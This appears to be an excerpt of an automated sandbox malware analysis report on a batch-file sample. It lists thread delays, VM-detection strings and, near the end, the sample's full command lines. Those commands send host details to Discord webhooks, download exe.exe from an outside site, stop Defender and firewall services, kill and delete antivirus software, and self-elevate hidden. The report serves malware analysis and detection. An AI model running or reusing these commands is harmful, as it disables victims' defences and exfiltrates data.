        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4089Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5812Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3157Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2472Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3060Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1504Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3244Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5360Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4413Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2767
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1457
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5996
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 649
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1727
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1764
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1141
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3495
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1496
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2366
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1333
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Documents\Secret Document\exe.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848Thread sleep count: 4089 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848Thread sleep count: 5812 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6372Thread sleep time: -11990383647911201s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep count: 3157 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep count: 2472 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1036Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 3060 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 1504 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep count: 3244 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep count: 301 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 5360 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 4413 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep count: 2767 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep count: 1457 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 5996 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep count: 649 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3164Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 1727 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep count: 1764 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 1141 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4216Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244Thread sleep count: 3495 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244Thread sleep count: 1496 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6132Thread sleep count: 2366 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep count: 1333 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_ComputerSystem
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000017.00000003.2356968286.000000000BE2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000(
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}D
        Source: explorer.exe, 00000017.00000003.2345423568.000000000BD1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\machine.inf_loc
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
        Source: explorer.exe, 00000017.00000003.2305115462.0000000009002000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2335332285.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2305220290.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2308846586.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.00000000091B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2708404298.000001774F258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BD1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000h
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BCDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000017.00000003.2346304263.000000000BC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.exe[
        Source: explorer.exe, 00000017.00000003.2308846586.0000000009172000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2305420089.0000000009171000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.0000000009172000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2335332285.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.0000000009157000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BC22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000mu
        Source: svchost.exe, 00000019.00000002.2703555050.000001774DC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: curl.exe, 00000003.00000002.1448116092.00000144AEF17000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1447719589.00000144AEF14000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1461699248.000001F8D32F5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.2265104443.00000189419E4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000003.2285772537.00000219E6793000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000017.00000003.2365894508.000000000BD1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BBCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000N
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: main.bat.bin.bat, type: SAMPLE
        Source: Yara matchFile source: amsi64_6104.amsi.csv, type: OTHER
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer,model Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "vmware virtualbox" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$process = get-process -id $pid; $process.processoraffinity = 1; $process.priorityclass = 'high'; $process.priorityboostenabled = $true; add-type -typedefinition 'using system; using system.runtime.interopservices; public class win32 { [dllimport(\"user32.dll\")] public static extern bool setwindowdisplayaffinity(intptr hwnd, uint dwaffinity); [dllimport(\"kernel32.dll\")] public static extern bool setprocessworkingsetsize(intptr proc, int min, int max); }'; [win32]::setwindowdisplayaffinity($process.mainwindowhandle, 0x11); [win32]::setprocessworkingsetsize($process.handle, -1, -1); $process.processname = 'svchost'"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$currentprincipal = new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent()); if (-not $currentprincipal.isinrole([security.principal.windowsbuiltinrole]::administrator)) { start-process -filepath 'cmd.exe' -argumentlist '/c c:\users\user\desktop\main.bat.bin.bat' -verb runas -windowstyle hidden; exit }; $process = get-process -id $pid; $process.priorityclass = 'high'; $process.processoraffinity = 1; $process.priorityboostenabled = $true"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { stop-process -name $p -force -erroraction silentlycontinue }"
